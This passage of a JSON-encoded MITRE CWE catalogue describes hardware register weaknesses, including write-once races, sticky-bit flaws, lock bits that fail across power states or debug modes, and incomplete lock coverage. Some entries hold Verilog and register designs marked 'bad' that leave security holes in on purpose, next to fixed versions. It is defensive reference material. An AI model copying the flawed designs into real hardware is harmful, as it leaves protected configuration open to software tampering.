Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-12-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1223":{"attr":{"@_ID":"1223","@_Name":"Race Condition for Write-Once Attributes","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A write-once register in hardware design is programmable by an untrusted software component earlier than the trusted software component, resulting in a race condition issue.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware IP software programmable controls and settings are commonly stored in register circuits. These register contents have to be initialized at hardware reset to defined default values that are hard coded in the hardware description language (HDL) code of the hardware unit. A common security protection method used to protect register settings from modification by software is to make them write-once. This means the hardware implementation only allows writing to such registers once, and they become read-only after having been written once by software. This is useful to allow initial boot software to configure systems settings to secure values while blocking runtime software from modifying such hardware settings.","Implementation issues in hardware design of such controls can expose such registers to a race condition security flaw. For example, consider a hardware design that has two different software/firmware modules executing in parallel. One module is trusted (module A) and another is untrusted (module B). In this design it could be possible for Module B to send write cycles to the write-once register before Module A. Since the field is write-once the programmed value from Module A will be ignored and the pre-empted value programmed by Module B will be used by hardware."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"This weakness can appear in designs that use register write-once attributes with two or more software/firmware modules with varying levels of trust executing in parallel."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"System configuration cannot be programmed in a secure way."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"During hardware design all register write-once or sticky fields must be evaluated for proper configuration."},{"Phase":"Testing","Description":"The testing phase should use automated tools to test that values are not reprogrammable and that write-once fields lock on writing zeros."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"consider the example design module system verilog code shown below. register_write_once_example module is an example of register that has a write-once field defined. Bit 0 field captures the write_once_status value.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:div":{"#text":"module register_write_once_example(input [15:0] Data_in,input Clk,input ip_resetn,input global_resetn,input write,output reg [15:0] Data_out);reg Write_once_status;always @(posedge Clk or negedge ip_resetn)if (~ip_resetn)beginData_out &lt;= 16\'h0000;Write_once_status &lt;= 1\'b0;endelse if (write &amp; ~Write_once_status)beginData_out &lt;= Data_in &amp; 16\'hFFFE; // Input data written to register after masking bit 0Write_once_status &lt;= 1\'b1; // Write once status set after first write.endelse if (~write)beginData_out[15:1] &lt;= Data_out[15:1];Data_out[0] &lt;= Write_once_status;endendmodule","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","","","","","",""]}},{"attr":{"@_Nature":"informative"},"xhtml:div":{"#text":"Trusted firmware or software trying to set the write-once field.- Must confirm the Write_once_status (bit 0) value is zero, before programming register. If another agent has programmed the register before, then Write_once_status value will be one.- After writing to the register, the trusted software can issue a read to confirm that the valid setting has been programmed.","xhtml:br":["",""]}}],"Body_Text":"The first system component that sends a write cycle to this register can program the value. This could result in a race condition security issue in SoC design, if an untrusted agent is running in the system in parallel with the trusted component that is expected to program the register."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"26"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-12-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1224":{"attr":{"@_ID":"1224","@_Name":"Improper Restriction of Write-Once Bit Fields","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The hardware design control register \\"sticky bits\\" or write-once bit fields are improperly implemented, such that they can be reprogrammed by software.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware IP software programmable controls and settings are commonly stored in register circuits. These register contents have to be initialized at hardware reset to define default values that are hard coded in the hardware description language (HDL) code of the hardware unit. A common security protection method used to protect register settings from modification by software is to make the settings write-once or \\"sticky.\\" This allows writing to such registers only once, whereupon they become read-only. This is useful to allow initial boot software to configure systems settings to secure values while blocking runtime software from modifying such hardware settings.","Failure to implement write-once restrictions in hardware design can expose such registers to being re-programmed by software and written multiple times. For example, write-once fields could be implemented to only be write-protected if they have been set to value \\"1\\", wherein they would work as \\"write-1-once\\" and not \\"write-once\\"."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation of hardware design, since IP parameters and defaults are defined in HDL code and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":"Varies by Context","Note":"System configuration cannot be programmed in a secure way."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"During hardware design all register write-once or sticky fields must be evaluated for proper configuration."},{"Phase":"Testing","Description":"The testing phase should use automated tools to test that values are not reprogrammable and that write-once fields lock on writing zeros."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider the example design module system verilog code shown below. register_write_once_example module is an example of register that has a write-once field defined. Bit 0 field captures the write_once_status value. This implementation can be for a register that is defined by specification to be a write-once register, since the write_once_status field gets written by input data bit 0 on first write.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:div":{"#text":"module register_write_once_example(input [15:0] Data_in,input Clk,input ip_resetn,input global_resetn,input write,output reg [15:0] Data_out);reg Write_once_status;always @(posedge Clk or negedge ip_resetn)if (~ip_resetn)beginData_out &lt;= 16\'h0000;Write_once_status &lt;= 1\'b0;endelse if (write &amp; ~Write_once_status)beginData_out &lt;= Data_in &amp; 16\'hFFFE;Write_once_status &lt;= Data_in[0]; // Input bit 0 sets Write_once_statusendelse if (~write)beginData_out[15:1] &lt;= Data_out[15:1];Data_out[0] &lt;= Write_once_status;endendmodule","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","","","","",""]}},{"attr":{"@_Nature":"informative"},"xhtml:div":{"#text":"module register_write_once_example(input [15:0] Data_in,input Clk,input ip_resetn,input global_resetn,input write,output reg [15:0] Data_out);reg Write_once_status;always @(posedge Clk or negedge ip_resetn)if (~ip_resetn)beginData_out &lt;= 16\'h0000;Write_once_status &lt;= 1\'b0;endelse if (write &amp; ~Write_once_status)beginData_out &lt;= Data_in &amp; 16\'hFFFE;Write_once_status &lt;= 1\'b1; // Write once status set on first write, independent of inputendelse if (~write)beginData_out[15:1] &lt;= Data_out[15:1];Data_out[0] &lt;= Write_once_status;endendmodule","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","","","","",""]}}],"Body_Text":"The above example only locks further writes if write_once_status bit is written to one. So it acts as write_1-Once instead of the write-once attribute."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-12-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1229":{"attr":{"@_ID":"1229","@_Name":"Creation of Emergent Resource","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product manages resources or behaves in a way that indirectly creates a new, distinct resource that can be used by attackers in violation of the intended policy.","Extended_Description":{"xhtml:p":"A product is only expected to behave in a way that was specifically intended by the developer.  Resource allocation and management is expected to be performed explicitly by the associated code.  However, in systems with complex behavior, the product might indirectly produce new kinds of resources that were never intended in the original design.  For example, a covert channel is a resource that was never explicitly intended by the developer, but it is useful to attackers.  \\"Parasitic computing,\\" while not necessarily malicious in nature, effectively tricks a product into performing unintended computations on behalf of another party."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1049"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-01-22"}}},"1230":{"attr":{"@_ID":"1230","@_Name":"Exposure of Sensitive Information Through Metadata","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product prevents direct access to a resource containing sensitive information, but it does not sufficiently limit access to metadata that is derived from the original, sensitive information.","Extended_Description":{"xhtml:p":"Developers might correctly prevent unauthorized access to a database or other resource containing sensitive information, but they might not consider that portions of the original information might also be recorded in metadata, search indices, statistical reports, or other resources.  If these resources are not also restricted, then attackers might be able to extract some or all of the original information, or otherwise infer some details.  For example, an attacker could specify search terms that are known to be unique to a particular person, or view metadata such as activity or creation dates in order to identify usage patterns."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-01-26"}}},"1231":{"attr":{"@_ID":"1231","@_Name":"Improper Prevention of Lock Bit Modification","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product uses a trusted lock bit for restricting access to registers, address regions, or other resources, but the product does not prevent the value of the lock bit from being modified after it has been set.","Extended_Description":{"xhtml:p":["In integrated circuits and hardware\\n\\t\\t\\t  intellectual property (IP) cores, device configuration\\n\\t\\t\\t  controls are commonly programmed after a device power\\n\\t\\t\\t  reset by a trusted firmware or software module (e.g.,\\n\\t\\t\\t  BIOS/bootloader) and then locked from any further\\n\\t\\t\\t  modification.","This behavior is commonly implemented using a trusted lock bit. \\n\\t\\t\\t  When set, the lock bit disables writes to a protected set of\\n\\t\\t\\t  registers or address regions. Design or coding errors in\\n\\t\\t\\t  the implementation of the lock bit protection feature\\n\\t\\t\\t  may allow the lock bit to be modified or cleared by\\n\\t\\t\\t  software after it has been set. Attackers might be able to unlock the system and\\n\\t\\t\\t  features that the bit is intended to protect."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Modify Memory","Likelihood":"High","Note":"Registers protected by lock bit can be modified even when lock is set."}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Set the lock bit. Power cycle the\\n\\t     device. Attempt to clear the lock bit.  If the\\n\\t     information is changed, implement a design\\n\\t     fix. Retest. Also, attempt to indirectly clear the lock\\n\\t     bit or bypass it.","Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation","Testing"],"Description":{"xhtml:ul":{"xhtml:li":["Security lock bit protections must be reviewed for design inconsistency and common weaknesses.","Security lock programming flow and lock properties must be tested in pre-silicon and post-silicon testing."]}},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider the example design below for a digital thermal sensor that detects overheating of the silicon and triggers system shutdown. The system critical temperature limit (CRITICAL_TEMP_LIMIT) and thermal sensor calibration (TEMP_SENSOR_CALIB) data have to be programmed by firmware, and then the register needs to be locked (TEMP_SENSOR_LOCK).","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["CRITICAL_TEMP_LIMIT",{"#text":"[31:8] Reserved field; Read only; Default 0[7:0] Critical temp 0-255 Centigrade; Read-write-lock; Default 125","xhtml:p":""}]},{"xhtml:td":["TEMP_SENSOR_CALIB","[31:0] Thermal sensor calibration data. Slope value used to map sensor reading to degrees Centigrade."]},{"xhtml:td":["TEMP_SENSOR_LOCK",{"#text":"[31:1] Reserved field; Read only; Default 0[0] Lock bit, locks CRITICAL_TEMP_LIMIT and TEMP_SENSOR_CALIB registers; Write-1-once; Default 0","xhtml:p":""}]},{"xhtml:td":["TEMP_HW_SHUTDOWN",{"#text":"[31:2] Reserved field; Read only; Default 0[1] Enable hardware shutdown on critical temperature detection; Read-write; Default 0","xhtml:p":""}]},{"xhtml:td":["CURRENT_TEMP",{"#text":"[31:8] Reserved field; Read only; Default 0[7:0] Current Temp 0-255 Centigrade; Read-only; Default 0","xhtml:p":""}]}]}},{"attr":{"@_Nature":"good"},"xhtml:p":"To fix this weakness, one could change the TEMP_HW_SHUTDOWN field to be locked by TEMP_SENSOR_LOCK.","xhtml:table":{"xhtml:tr":{"xhtml:td":["TEMP_HW_SHUTDOWN",{"#text":"[31:2] Reserved field; Read only; Default 0[1] Enable hardware shutdown on critical temperature detection; Read-write-Lock; Default 0[0] Locked by TEMP_SENSOR_LOCK","xhtml:p":["",""]}]}}}],"Body_Text":"In this example, note that if the system heats to critical temperature, the response of the system is controlled by the TEMP_HW_SHUTDOWN bit [1], which is not lockable. Thus, the intended security property of the critical temperature sensor cannot be fully protected, since software can misconfigure the TEMP_HW_SHUTDOWN register even after the lock bit is set to disable the shutdown response."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2017-6283","Description":"chip reset clears critical read/write lock permissions for RSA function","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6283"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-01-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Contribution":[{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Narasimha Kumar V Mangipudi","Contribution_Organization":"Lattice Semiconductor","Contribution_Date":"2021-10-20","Contribution_Comment":"reviewed content changes"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"provided observed example"}]}},"1232":{"attr":{"@_ID":"1232","@_Name":"Improper Lock Behavior After Power State Transition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Register lock bit protection disables changes to system configuration once the bit is set. Some of the protected registers or lock bits become programmable after power state transitions (e.g., Entry and wake from low power sleep modes) causing the system configuration to be changeable.","Extended_Description":{"xhtml:p":["Devices may allow device configuration controls which need to be programmed after device power reset via a trusted firmware or software module (commonly set by BIOS/bootloader) and then locked from any further modification. This action is commonly implemented using a programmable lock bit, which, when set, disables writes to a protected set of registers or address regions.","After a power state transition, the lock bit is set to unlocked. Some common weaknesses that can exist in such a protection scheme are that the lock gets cleared, the values of the protected registers get reset, or the lock become programmable."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Modify Memory","Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation","Testing"],"Description":{"xhtml:ul":{"xhtml:li":["Security Lock bit protections should be reviewed for behavior across supported power state transitions.","Security lock programming flow and lock properties should be tested in pre-silicon and post-silicon testing including testing across power transitions."]}},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Consider the memory configuration settings of a system that uses DDR3 DRAM memory. Protecting the DRAM memory configuration from modification by software is required to ensure that system memory access control protections cannot be bypassed. This can be done by using lock bit protection that locks all of the memory configuration registers. The memory configuration lock can be set by the BIOS during the boot process.","If such a system also supports a rapid power on mode like hibernate, the DRAM data must be saved to a disk before power is removed and restored back to the DRAM once the system powers back up and before the OS resumes operation after returning from hibernate."]},"Body_Text":"To support the hibernate transition back to the operating state, the DRAM memory configuration must be reprogrammed even though it was locked previously. As the hibernate resume does a partial reboot, the memory configuration could be altered before the memory lock is set. Functionally the hibernate resume flow requires a bypass of the lock-based protection. The memory configuration must be securely stored and restored by trusted system firmware. Lock settings and system configuration must be restored to the same state it was in before the device entered into the hibernate mode."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"166"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-01-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description"}]}},"1233":{"attr":{"@_ID":"1233","@_Name":"Security-Sensitive Hardware Controls with Missing Lock Bit Protection","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product uses a register lock bit protection mechanism, but it does not ensure that the lock bit prevents modification of system registers or controls that perform changes to important hardware system configuration.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware intellectual properties (IPs) might provide device configuration controls that need to be programmed after device power reset by a trusted firmware or software module, commonly set by BIOS/bootloader. After reset, there can be an expectation that the controls cannot be used to perform any further modification. This behavior is commonly implemented using a trusted lock bit, which can be set to disable writes to a protected set of registers or address regions. The lock protection is intended to prevent modification of certain system configuration (e.g., memory/memory protection unit configuration).","However, if the lock bit does not effectively write-protect all system registers or controls that could modify the protected system configuration, then an adversary may be able to use software to access the registers/controls and modify the protected hardware configuration."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases."},{"Phase":"Implementation","Note":"Such issues could be introduced during implementation and identified later during Testing or System Configuration phases."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Modify Memory","Note":"System Configuration protected by the lock bit can be modified even when the lock is set."}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Set the lock bit. Attempt to modify the\\n\\t     information protected by the lock bit. If the information\\n\\t     is changed, implement a design fix. Retest. Also, attempt\\n\\t     to indirectly clear the lock bit or bypass\\n\\t     it.","Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation","Testing"],"Description":{"xhtml:ul":{"xhtml:li":["Security lock bit protections must be reviewed for design inconsistency and common weaknesses.","Security lock programming flow and lock properties must be tested in pre-silicon and post-silicon testing."]}}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider the example design below for a digital thermal sensor that detects overheating of the silicon and triggers system shutdown. The system critical temperature limit (CRITICAL_TEMP_LIMIT) and thermal sensor calibration (TEMP_SENSOR_CALIB) data have to be programmed by the firmware.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["CRITICAL_TEMP_LIMIT",{"#text":"[31:8] Reserved field; Read only; Default 0[7:0] Critical temp 0-255 Centigrade; Read-write-lock; Default 125","xhtml:p":""}]},{"xhtml:td":["TEMP_SENSOR_CALIB","[31:0] Thermal sensor calibration data. A slope value used to map sensor reading to a degree Centigrade. Read-write; Default 25"]},{"xhtml:td":["TEMP_SENSOR_LOCK",{"#text":"[31:1] Reserved field; Read only; Default 0[0] Lock bit, locks CRITICAL_TEMP_LIMIT register; Write-1-once; Default 0","xhtml:p":""}]},{"xhtml:td":["TEMP_HW_SHUTDOWN",{"#text":"[31:2] Reserved field; Read only; Default 0[1] Enable hardware shutdown on a critical temperature detection; Read-write; Default 0","xhtml:p":""}]},{"xhtml:td":["CURRENT_TEMP",{"#text":"[31:8] Reserved field; Read only; Default 0[7:0]   Current Temp 0-255 Centigrade; Read-only; Default 0","xhtml:p":""}]}]}},{"attr":{"@_Nature":"good"},"xhtml:p":"Change TEMP_HW_SHUTDOWN and TEMP_SENSOR_CALIB controls to be locked by TEMP_SENSOR_LOCK.","xhtml:table":{"xhtml:tr":[{"xhtml:td":["TEMP_SENSOR_CALIB","[31:0] Thermal sensor calibration data. A slope value used to map sensor reading to a degree Centigrade. Read-write-Lock; Default 25; Locked by TEMP_SENSOR_LOCK bit[0]"]},{"xhtml:td":["TEMP_HW_SHUTDOWN",{"#text":"[31:2] Reserved field; Read only; Default 0[1] Enable hardware shutdown on critical temperature detection; Read-write-Lock; Default 0; Locked by TEMP_SENSOR_LOCK bit[0]","xhtml:p":""}]}]}}],"Body_Text":{"xhtml:p":["In this example note that only the CRITICAL_TEMP_LIMIT register is protected by the TEMP_SENSOR_LOCK bit, while the security design intent is to protect any modification of the critical temperature detection and response.","The response of the system, if the system heats to a critical temperature, is controlled by TEMP_HW_SHUTDOWN bit [1], which is not lockable. Also, the TEMP_SENSOR_CALIB register is not protected by the lock bit.","By modifying the temperature sensor calibration, the conversion of the sensor data to a degree centigrade can be changed, such that the current temperature will never be detected to exceed critical temperature value programmed by the protected lock.","Similarly, by modifying the TEMP_HW_SHUTDOWN.Enable bit, the system response detection of the current temperature exceeding critical temperature can be disabled."]}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2018-9085","Description":"Certain servers leave a write protection lock bit\\n\\t\\tunset after boot, potentially allowing modification of\\n\\t\\tparts of flash memory.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9085"},{"Reference":"CVE-2014-8273","Description":"Chain: chipset has a race condition (CWE-362) between when an interrupt handler detects an attempt to write-enable the BIOS (in violation of the lock bit), and when the handler resets the write-enable bit back to 0, allowing attackers to issue BIOS writes during the timing window [REF-1237].","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8273"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"176"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1237"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-01-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Narasimha Kumar V Mangipudi","Contribution_Organization":"Lattice Semiconductor","Contribution_Date":"2021-10-20","Contribution_Comment":"reviewed content changes"}}},"1234":{"attr":{"@_ID":"1234","@_Name":"Hardware Internal or Debug Modes Allow Override of Locks","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"System configuration protection may be bypassed during debug mode.","Extended_Description":{"xhtml:p":"Device configuration controls are commonly programmed after a device power reset by a trusted firmware or software module (e.g., BIOS/bootloader) and then locked from any further modification. This is commonly implemented using a trusted lock bit, which when set, disables writes to a protected set of registers or address regions. The lock protection is intended to prevent modification of certain system configuration (e.g., memory/memory protection unit configuration). If debug features supported by hardware or internal modes/system states are supported in the hardware design, modification of the lock protection may be allowed allowing access and modification of configuration information."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Likelihood":"High","Note":"Bypass of lock bit allows access and modification of system configuration even when the lock bit is set."}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation","Testing"],"Description":{"xhtml:ul":{"xhtml:li":["Security Lock bit protections should be reviewed for any bypass/override modes supported.","Any supported override modes either should be removed or protected using authenticated debug modes.","Security lock programming flow and lock properties should be tested in pre-silicon and post-silicon testing."]}},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"#text":"For example, consider the example Locked_override_register example. This register module supports a lock mode that blocks any writes after lock is set to 1.However, it also allows override of the lock protection when scan_mode or debug_unlocked modes are active.","xhtml:br":""},"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:p":["module Locked_register_example","(",{"#text":"input [15:0] Data_in,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input Clk,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input resetn,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input write,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input Lock,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input scan_mode,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input debug_unlocked,","attr":{"@_style":"text-indent: 15px;"}},{"#text":"output reg [15:0] Data_out","attr":{"@_style":"text-indent: 15px;"}},");","","reg lock_status;","","always @(posedge Clk or negedge resetn)","if (~resetn) // Register is reset resetn",{"#text":"begin","attr":{"@_style":"text-indent: 15px;"}},{"#text":"lock_status &lt;= 1\'b0;","attr":{"@_style":"text-indent: 30px;"}},{"#text":"end","attr":{"@_style":"text-indent: 15px;"}},{"#text":"else if (Lock)","attr":{"@_style":"text-indent: 15px;"}},{"#text":"begin","attr":{"@_style":"text-indent: 